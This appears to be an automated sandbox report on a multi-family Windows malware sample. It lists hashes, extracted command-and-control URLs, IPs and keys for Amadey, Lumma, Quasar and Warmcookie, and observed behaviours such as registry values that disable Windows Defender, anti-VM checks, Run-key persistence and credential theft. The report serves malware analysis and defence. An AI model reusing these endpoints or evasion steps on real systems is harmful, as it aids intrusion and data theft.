Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
01/04/2025, 17:44
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250313-en
General
-
Target
2025-04-01_1cbc80c77a01e855f05fe33a43a8e977_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
1cbc80c77a01e855f05fe33a43a8e977
-
SHA1
1db146c4e6de2e346c0691144cfa17147fc55815
-
SHA256
78ff4b03b39c789d662f42471312a413b005f73e496a42d4b5e7b8e18cfa84b4
-
SHA512
453374671899392bf93fa9ea6b1070fd0981832d120092c3c9a839e43438189e8612b487b31bb35ab50595eb5f878c377a23469d746ebb56994d560e4742d91b
-
SSDEEP
24576:TqDEvCTbMWu7rQYlBQcBiT6rprG8a0Nu:TTvC/MTQYxsWR7a0N
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://hadvennture.top/GKsiio
https://anavstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
Extracted
quasar
1.4.1
CyberPunk
dakar.wohowoho.com:443
dakar.wohowoho.com:80
206.206.76.75:443
206.206.76.75:80
62.60.226.176:80
62.60.226.176:443
5e809a5b-bb22-41b6-af20-5285e99040d3
-
encryption_key
A98DEEE2D49BDF1C5183B3079E9B28E281586F6F
-
install_name
chrome.exe
-
log_directory
Logs
-
reconnect_delay
30000
-
startup_key
GoogleChrome
-
subdirectory
Google\Chrome
Extracted
amadey
5.33
faec90
-
install_dir
52907c9546
-
install_file
tgvazx.exe
-
strings_key
cc9d94f7503394295f4824f8cfd50608
-
url_paths
/Di0Her478/index.php
Extracted
warmcookie
192.36.57.50
-
mutex
62580f79-f0e4-46c9-9fe6-041328dce2b7
-
user_agent
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2400-1191-0x00000000009B0000-0x0000000000E04000-memory.dmp healer behavioral1/memory/2400-1198-0x00000000009B0000-0x0000000000E04000-memory.dmp healer behavioral1/memory/2400-4072-0x00000000009B0000-0x0000000000E04000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 8bc5209835.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 8bc5209835.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8bc5209835.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8bc5209835.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8bc5209835.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8bc5209835.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8bc5209835.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8bc5209835.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 8bc5209835.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 8bc5209835.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x000700000002424b-175.dat family_quasar behavioral1/memory/2996-188-0x0000000000450000-0x0000000000772000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3740 created 2896 3740 Abspawnhlp.exe 50 PID 4912 created 2896 4912 CamMenuMaker.exe 50 -
Warmcookie family
-
Warmcookie, Badspace
Warmcookie aka Badspace is a backdoor written in C++.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8bc5209835.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5338edf835.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5e593f5981.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a86f684b95.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 55ba869587.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 17 5816 powershell.exe 120 3288 powershell.exe 297 2328 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5520 powershell.exe 7296 powershell.exe 5816 powershell.exe 6192 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 26 IoCs
flow pid Process 274 4932 svchost015.exe 17 5816 powershell.exe 31 2492 rapes.exe 275 2492 rapes.exe 92 2492 rapes.exe 92 2492 rapes.exe 92 2492 rapes.exe 92 2492 rapes.exe 95 6020 Abspawnhlp.exe 95 6020 Abspawnhlp.exe 95 6020 Abspawnhlp.exe 95 6020 Abspawnhlp.exe 121 2492 rapes.exe 121 2492 rapes.exe 120 3288 powershell.exe 224 5932 svchost015.exe 289 3508 svchost.exe 235 2492 rapes.exe 270 2492 rapes.exe 297 2328 powershell.exe 41 2492 rapes.exe 41 2492 rapes.exe 41 2492 rapes.exe 41 2492 rapes.exe 292 2492 rapes.exe 316 2492 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2448 icacls.exe 3688 takeown.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\JQ2rzJ_7400\ImagePath = "\\??\\C:\\Windows\\Temp\\JQ2rzJ_7400.sys" tzutil.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8bc5209835.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5e593f5981.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a86f684b95.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8bc5209835.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5e593f5981.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5338edf835.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5338edf835.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a86f684b95.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 55ba869587.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 55ba869587.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation Abspawnhlp.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation LXUZVRLG.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation Abspawnhlp.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation KRWXARXD.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation PQPYAYJJ.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe -
Deletes itself 1 IoCs
pid Process 7440 w32tm.exe -
Executes dropped EXE 59 IoCs
pid Process 2888 TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE 2492 rapes.exe 2824 PQPYAYJJ.exe 4896 Abspawnhlp.exe 4012 Abspawnhlp.exe 5612 h8NlU62.exe 3896 rapes.exe 2996 NHq7LaU.exe 4344 chrome.exe 2808 qWR3lUj.exe 3888 HAe88WC.exe 4780 apple.exe 912 261.exe 1972 261.exe 5828 HAe88WC.exe 4364 5e593f5981.exe 2328 Abspawnhlp.exe 2316 Abspawnhlp.exe 5932 svchost015.exe 1880 LXUZVRLG.exe 3412 Abspawnhlp.exe 5700 890172171_x64.exe 1808 a86f684b95.exe 4932 svchost015.exe 1592 CamMenuMaker.exe 4376 CamMenuMaker.exe 5232 55ba869587.exe 680 Abspawnhlp.exe 3760 CamMenuMaker.exe 1544 CamMenuMaker.exe 4276 b123c29fff.exe 3620 Updater.exe 5196 rapes.exe 4092 IEYKSCXV.exe 5680 96b3ec11f4.exe 648 KRWXARXD.exe 1656 CamMenuMaker.exe 2400 8bc5209835.exe 7980 c95b3da7df.exe 1976 8480483e2e.exe 2176 datCB3B.exe 7384 Abspawnhlp.exe 7464 Abspawnhlp.exe 7932 5338edf835.exe 4616 NHq7LaU.exe 4768 chrome.exe 6464 Rm3cVPI.exe 5624 HelpLink.exe 7532 7IIl2eE.exe 3044 dat1D16.exe 5776 Abspawnhlp.exe 5704 Abspawnhlp.exe 8072 p3hx1_003.exe 5756 Passwords.com 1708 EPTwCQd.exe 7400 tzutil.exe 7440 w32tm.exe 11960 rapes.exe 12200 XOPPRUc.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 8bc5209835.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 5338edf835.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 55ba869587.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 5e593f5981.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine a86f684b95.exe -
Loads dropped DLL 64 IoCs
pid Process 4896 Abspawnhlp.exe 4896 Abspawnhlp.exe 4896 Abspawnhlp.exe 4896 Abspawnhlp.exe 4896 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 4012 Abspawnhlp.exe 6020 Abspawnhlp.exe 2328 Abspawnhlp.exe 2328 Abspawnhlp.exe 2328 Abspawnhlp.exe 2328 Abspawnhlp.exe 2328 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 2316 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 3412 Abspawnhlp.exe 1592 CamMenuMaker.exe 1592 CamMenuMaker.exe 1592 CamMenuMaker.exe 1592 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 4376 CamMenuMaker.exe 6080 Abspawnhlp.exe 3740 Abspawnhlp.exe 3760 CamMenuMaker.exe 3760 CamMenuMaker.exe 3760 CamMenuMaker.exe 3760 CamMenuMaker.exe 1544 CamMenuMaker.exe 1544 CamMenuMaker.exe 1544 CamMenuMaker.exe 1544 CamMenuMaker.exe 1656 CamMenuMaker.exe 1656 CamMenuMaker.exe 1656 CamMenuMaker.exe 1656 CamMenuMaker.exe 4912 CamMenuMaker.exe 7384 Abspawnhlp.exe 7384 Abspawnhlp.exe 7384 Abspawnhlp.exe 7384 Abspawnhlp.exe 7384 Abspawnhlp.exe 7464 Abspawnhlp.exe 7464 Abspawnhlp.exe 7464 Abspawnhlp.exe 7464 Abspawnhlp.exe 7464 Abspawnhlp.exe 6400 CamMenuMaker.exe 3892 Abspawnhlp.exe 5776 Abspawnhlp.exe 5776 Abspawnhlp.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2448 icacls.exe 3688 takeown.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 8bc5209835.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8bc5209835.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\55ba869587.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10408330101\\55ba869587.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b123c29fff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10408340101\\b123c29fff.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\96b3ec11f4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10408350101\\96b3ec11f4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8bc5209835.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10408360101\\8bc5209835.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00090000000242f1-661.dat autoit_exe -
Drops file in System32 directory 58 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\declarator.txt dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\buttercup.swf Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Comn.dll datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\msvcp80.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\msvcp80.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\msvcr80.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\Comn.dll datCB3B.exe File created C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\buttercup.swf dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\Comn.dll dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\buttercup.swf Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Comn.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\libssl-1_1.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\declarator.txt Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\buttercup.swf datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\SearchWiwer7_8 dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\E1BQC0QS.htm Updater.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\204EH22G.htm Updater.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\libcrypto-1_1.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\libssl-1_1.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll datCB3B.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\libcrypto-1_1.dll Abspawnhlp.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\5GUWOJJX.htm Updater.exe File created C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll dat1D16.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\RMS_RDP_1 datCB3B.exe File created C:\Windows\SysWOW64\config\systemprofile\buttercup.swf datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\declarator.txt datCB3B.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll datCB3B.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll datCB3B.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Comn.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\declarator.txt Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Package dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\buttercup.swf dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll dat1D16.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll dat1D16.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Package datCB3B.exe File created C:\Windows\SysWOW64\config\systemprofile\declarator.txt datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Comn.dll dat1D16.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll dat1D16.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\msvcr80.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll datCB3B.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\declarator.txt dat1D16.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1972 tasklist.exe 8184 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 2888 TempYKLPKUXYMDH6CD8RJ8MW8OGYZ5QCFQAJ.EXE 2492 rapes.exe 3896 rapes.exe 4364 5e593f5981.exe 1808 a86f684b95.exe 5232 55ba869587.exe 5196 rapes.exe 2400 8bc5209835.exe 7932 5338edf835.exe 11960 rapes.exe -
Suspicious use of SetThreadContext 22 IoCs
description pid Process procid_target PID 5612 set thread context of 4372 5612 h8NlU62.exe 109 PID 4012 set thread context of 6020 4012 Abspawnhlp.exe 112 PID 2808 set thread context of 2892 2808 qWR3lUj.exe 119 PID 3888 set thread context of 1204 3888 HAe88WC.exe 122 PID 5828 set thread context of 4328 5828 HAe88WC.exe 202 PID 4012 set thread context of 4444 4012 Abspawnhlp.exe 123 PID 4364 set thread context of 5932 4364 5e593f5981.exe 208 PID 1808 set thread context of 4932 1808 a86f684b95.exe 214 PID 2316 set thread context of 6080 2316 Abspawnhlp.exe 213 PID 6020 set thread context of 680 6020 Abspawnhlp.exe 220 PID 3412 set thread context of 3740 3412 Abspawnhlp.exe 215 PID 2316 set thread context of 3708 2316 Abspawnhlp.exe 228 PID 7980 set thread context of 6684 7980 c95b3da7df.exe 273 PID 3412 set thread context of 1312 3412 Abspawnhlp.exe 236 PID 1544 set thread context of 6660 1544 CamMenuMaker.exe 272 PID 4376 set thread context of 4380 4376 CamMenuMaker.exe 262 PID 1656 set thread context of 8148 1656 CamMenuMaker.exe 283 PID 7464 set thread context of 3892 7464 Abspawnhlp.exe 292 PID 1708 set thread context of 7508 1708 EPTwCQd.exe 334 PID 5704 set thread context of 4448 5704 Abspawnhlp.exe 331 PID 7464 set thread context of 3452 7464 Abspawnhlp.exe 306 PID 12200 set thread context of 12228 12200 XOPPRUc.exe 339 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File 